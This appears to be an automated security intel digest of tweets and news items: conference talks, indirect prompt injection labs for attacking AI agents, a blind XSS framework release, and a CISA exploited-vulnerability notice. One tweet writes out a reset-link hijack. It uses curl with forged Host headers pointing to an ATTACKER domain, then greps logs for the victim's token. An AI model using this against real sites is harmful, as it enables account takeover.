Official intelligence summary

HAIJA INTEL REPORT

Generated 04/08/2026, 09:35. Pipeline: Europe/Belgrade. Regular sources favor exploit, blog, red-team, and attack-path content. CVE items only stay with exploit signal.
Total items15
Regular sources4
Tweets / X11
Threshold0.62
You can save this report in your browser with the favorite button. If you need a shared favorite list, use the CLI helper.

Tweets / X

11 items
@outflanknl avatar
outflanknl @outflanknl
03 Aug, 17:00 · core
0.74
Don’t miss red team operator Cedric Van Bockhaven’s presentation at Fortra’s Black Hat booth #2939 Wednesday morning. We will have in-booth tradecraft presentations running on both Wednesday and Thursday of Black Hat USA 2026. See our full schedule here: https:// cobaltstrike.com
tweet mediatweet media
@SpecterOps avatar
SpecterOps @SpecterOps
03 Aug, 21:22 · core
0.48
AI agents are expanding the attack surface. Are your defenses evolving too? Join @jaredcatkinson and @JustinKohler10 for our upcoming webinar and learn why Identity Attack Path Management is becoming even more critical. Register: https:// ghst.ly/4h0yWPn
tweet mediatweet media
@nahamsec avatar
nahamsec @nahamsec
03 Aug, 20:59 · core
0.48
Watch @NahamSec and me walk through an AI hacking lab I built to recreate a real AI vulnerability. If you want to learn about Indirect Prompt Injection, this is an easy way to start! I sat down with @TakSec and he taught me everything I needed to know about Indirect Prompt Inject
tweet media
@nahamsec avatar
nahamsec @nahamsec
03 Aug, 19:43 · core
0.48
I’m speaking at Red Team Village doing the keynote with @NahamSec and a couple of other amazing people. Looking forward to meeting everyone and talking about AI security. See you at 10 a.m. on Friday - @RedTeamVillage_ #defcon
tweet mediatweet media
@nahamsec avatar
nahamsec @nahamsec
03 Aug, 16:46 · core
0.48
Cool :) I sat down with @TakSec and he taught me everything I needed to know about Indirect Prompt Injection using a free custom lab on @hackinghub_io! https:// youtu.be/8yI10AgOevQ
tweet media
@nahamsec avatar
nahamsec @nahamsec
03 Aug, 15:31 · core
0.48
CONTENTS OF BEN ARE AWESOME I sat down with @TakSec and he taught me everything I needed to know about Indirect Prompt Injection using a free custom lab on @hackinghub_io! https:// youtu.be/8yI10AgOevQ
tweet media
@brutelogic avatar
brutelogic @brutelogic
03 Aug, 16:05 · secondary
0.46
Reset Link Hijack 1. Set your domain and target/victim a=ATTACKER && curl https://TARGET/reset -d "email=VICTIM" -H "Host: $a " -H "X-Forwarded-Host: $a " -H "X-Host: $a " 2. Watch the logs tail -f /var/log/apache2/./access.log | grep -i "token" Victim clicks, token is yours.
tweet mediatweet media
@Jhaddix avatar
Jhaddix @Jhaddix
03 Aug, 22:59 · core
0.42
Hacker Summer Camp Day 0: Today @arcanuminfosec is releasing WRAITH, our new browser hooking and blind XSS framework. Enjoy! https:// github.com/Arcanum-Sec/wr aith …
tweet mediatweet media
@CrowdStrike avatar
CrowdStrike @CrowdStrike
03 Aug, 17:00 · secondary
0.35
The CrowdStrike 2026 Threat Hunting Report is here. 2.5X: CrowdStrike OverWatch has observed significant growth in AI agent-triggered detection leads, now tracking at 2.5x the rate of human-triggered leads. 24 hours: China-nexus adversaries rapidly exploit
tweet media
@_JohnHammond avatar
_JohnHammond @_JohnHammond
03 Aug, 15:40 · secondary
0.32
Whether we want to admit it or not - the more we connect to our agents, the larger we are making the attack surface. In my @btphantomlabs blog below, I go over how easy it is to impersonate a user (with stolen credentials) through OpenAIs "Apps" (remote MCP servers):
@RedCanary avatar
RedCanary @RedCanary
03 Aug, 17:47 · secondary
0.31
Hot take: One of the most effective privilege escalation techniques is over a decade old and most orgs still aren't fully protected. Tomorrow, the legendary researcher @TimMedin - who coined the term - joins us on SecOps Weekly to break down why Kerberoasting refuses to die
tweet mediatweet media

Regular sources

4 items
1.00critical · 03 Aug, 14:00cisa.govWild exploit

CISA Adds One Known Exploited Vulnerability to Catalog

CISA has added one new vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation. CVE-2026-18577 N-able N-central Auth…

1.00general · 03 Aug, 06:30helpnetsecurity.comAttack path

Product showcase: Guardio Mobile Security turns breach alerts into a recovery plan

Guardio Mobile Security brings several protection features to iPhone and Android, allowing users to monitor exposed personal information, identify phishing attempts, and…

1.00exploit · 03 Aug, 03:25seclists.org

Re: Some Changes to GNOME Security Tracking

Posted by Jacob Bachmeyer on Aug 02 This is a perfectly legitimate support model; to some extent, it is what distributions do today. Akrites seems to have managed to pur…

0.91general · 03 Aug, 08:00helpnetsecurity.comResearch

Mapping the malware blast radius a single alert won’t show you

In this interview with Help Net Security, Mike Wiacek, founder and CTO of Stairwell, explains Backstory, an AI agent that takes a single alert and works outward to map h…